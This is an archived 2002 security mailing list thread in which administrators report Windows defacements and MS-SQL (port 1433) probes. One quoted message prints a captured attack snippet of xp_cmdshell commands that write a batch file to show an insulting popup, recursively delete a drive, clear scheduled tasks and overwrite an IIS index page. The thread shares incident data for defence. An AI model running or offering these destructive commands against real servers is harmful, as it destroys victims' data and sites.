Security Incidents mailing list archives
RE: Windows Systems Defaced
From: "Johannes B. Ullrich" <jullrich () sans org>
Date: Fri, 3 May 2002 14:43:56 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SQL probe reports to DShield skyrocketed today. It looks like a small number of sources scanning large IP ranges one after another. http://www.dshield.org/port_report.php?port=1433 On Fri, 3 May 2002, Brenna Primrose wrote:
I saw SQL probes today on several of our systems from wanadoo.fr -- coincidence? I think not. Wanadoo.fr is infamous for looking for FTP servers to crack. Hmmm... AIM - abosolut x psycho Yahoo! - absolut_contagion ICQ - 1363187 http://gsa.creighton.edu http://profiles.yahoo.com/absolut_contagion -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ G e* h- r++ x+ ------END GEEK CODE BLOCK------ -----Original Message----- From: Steve Zenone [mailto:zenone () cats ucsc edu] Sent: Thursday, May 02, 2002 10:24 PM To: incidents () securityfocus com Cc: thompson () isc upenn edu Subject: RE: Windows Systems Defaced Hello, Stephen W. Thompson wrote: |> Have any of you seen similar activity? Any thoughts? | |Yes, we had one that matches most of your details. These |are exact matches: | |> [] Damage occurred around 1600 on 5/1/2002 |BUT=> (approx. 16:00 EDT for us) |> [] Win-popup message with "F---ing University of Rochester" |> -- NOTE: not all systems running IIS |> [] Admins claimed that all systems were patched correctly |> [] Most were running updated and current AV Thank you very much for your reply - it definitely helps! We have been seeing MS-SQL (1433/tcp) attacks that try and execute the following: -----BEGIN SNIPPET----- xp_cmdshell 'echo net send localhost F---ing University of Rochester rebooting... > rochester.bat' xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat' xp_cmdshell 'at /delete /y' xp_cmdshell 'echo if exist \inetpub\wwwroot\ type %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> rochester.bat' -----END SNIPPET----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
- -- - ------- jullrich () sans org Join http://www.DShield.org Distributed Intrusion Detection System -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE80tptwWQP+4im9DYRAvS6AKCx/JaYmx1fI6nEn8oHCmqFoPMaBgCfRok0 LayncBWEGwAz57XdPsdeMpA= =eakE -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Windows Systems Defaced Steve Zenone (May 02)
- <Possible follow-ups>
- Re: Windows Systems Defaced Stephen W. Thompson (May 02)
- RE: Windows Systems Defaced Steve Zenone (May 02)
- RE: Windows Systems Defaced H C (May 03)
- RE: Windows Systems Defaced Brenna Primrose (May 03)
- RE: Windows Systems Defaced Johannes B. Ullrich (May 03)
- Windows Systems Defaced/destroyed, plus Port 3389 attacks Bukys, Liudvikas (May 13)
- RE: Windows Systems Defaced Steve Zenone (May 02)